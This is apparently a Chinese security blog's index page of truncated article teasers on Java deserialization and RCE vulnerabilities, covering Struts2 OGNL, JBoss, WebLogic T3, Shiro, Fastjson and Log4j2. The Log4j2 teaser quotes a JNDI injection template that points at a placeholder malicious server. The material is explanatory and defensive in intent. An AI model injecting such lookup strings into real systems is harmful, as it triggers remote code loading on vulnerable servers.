1. 什么是序列化和反序列化? 序列化:将内存中的对象转换为可存储(如文件、数据库)或可传输(如网络流)的字节流 / 字符串的过程。 反序列化:将序列化后的字节流 / 字符串恢复为原对象的过程,是序列化的逆操作。 2.为什么要进行序列化和反序列化? 内存中的对象无法直接存储或传输,需通过序列化转换为通用格式(字节流 / 字符串)。 解决不同系统、语…
反序列化漏洞面试题
Struts2 远程代码执行漏洞(S2-059)深度剖析
一、漏洞概述 1. 漏洞描述 Struts2 是 Apache 推出的基于 MVC 模式的轻量级 Web 框架,在处理标签属性(如id)值时,会将用户可控参数直接作为OGNL 表达式解析。攻击者可构造恶意 OGNL 表达式注入标签属性,框架解析时执行表达式中的恶意代码,导致远程代码执行(RCE)。 2. OGNL 表达式基础 定义:Object-G…
JBoss 反序列化漏洞深度解析:从 CVE-2017-12149 到 CVE-2017-7504
一、JBoss 概述 1. 基本介绍 JBoss 是 Red Hat 公司维护的开源 Java EE 应用服务器,支持企业级功能如 EJB(企业组件)、JMS(消息服务)、JNDI(命名服务)等,常见版本包括 JBoss AS、WildFly、JBoss EAP,广泛应用于企业级系统。 2. 反序列化漏洞背景 JBoss 部分组件(如 HttpIn…
WebLogic T3 反序列化漏洞深度剖析:从协议原理到攻防实践
一、漏洞概述 WebLogic 是 Oracle 推出的 Java 应用服务器,其专有通信协议T3 协议因存在反序列化缺陷,成为远程代码执行漏洞的重灾区。攻击者可构造恶意序列化数据,通过 T3 协议发送给 WebLogic 服务器,在服务器反序列化过程中执行任意代码,实现远程控制。 历史上基于 T3 协议的高危漏洞包括 CVE-2015-4582、…
Apache Shiro 反序列化漏洞全解析:从 550 到 721 的攻防对抗
一、Apache Shiro 漏洞概述 Apache Shiro 是一款流行的 Java 安全框架,提供身份认证、授权、会话管理等功能。但其历史版本中存在两个高危反序列化漏洞 ——Shiro 550(CVE-2016-4437) 和Shiro 721,攻击者可利用漏洞实现远程代码执行,对 Java 应用造成严重威胁。 二、Shiro 550 反序列…
Fastjson 反序列化漏洞解析
一、Fastjson 概述 (一)基本介绍 Fastjson 是阿里巴巴开源的高性能 JSON 解析库,支持 Java 对象与 JSON 字符串的快速转换,因速度快、API 简洁、功能完备等特点,被广泛应用于缓存序列化、协议交互等场景。 (二)核心功能 序列化:通过JSON.toJSONString(obj)将 Java 对象转换为 JSON 字符…
Apache Log4j2 远程代码执行漏洞全解析
Apache Log4j2 远程代码执行漏洞全解析 一、漏洞概述 1. 漏洞原理 Apache Log4j2 是 Java 生态中广泛使用的日志框架,其Lookup功能存在致命缺陷:未限制 JNDI(Java 命名和目录接口)查询。攻击者可在日志消息中插入恶意 JNDI 表达式(如${jndi:rmi://恶意服务器/恶意类}),触发 Log4j2…
Java 反序列化漏洞:从原理到防护全解析
什么是 Java 序列化与反序列化 Java 序列化是将内存中的对象转换为字节流的过程,目的是实现对象在不同存储介质(如内存、文件、数据库)或网络间的高效传递 —— 例如网络通信时,发送方需通过序列化将对象转为字节流才能传输;而反序列化则是其逆操作,接收方通过该过程将字节流还原为可直接使用的原始对象。 从技术实现来看,序列化依赖Obj…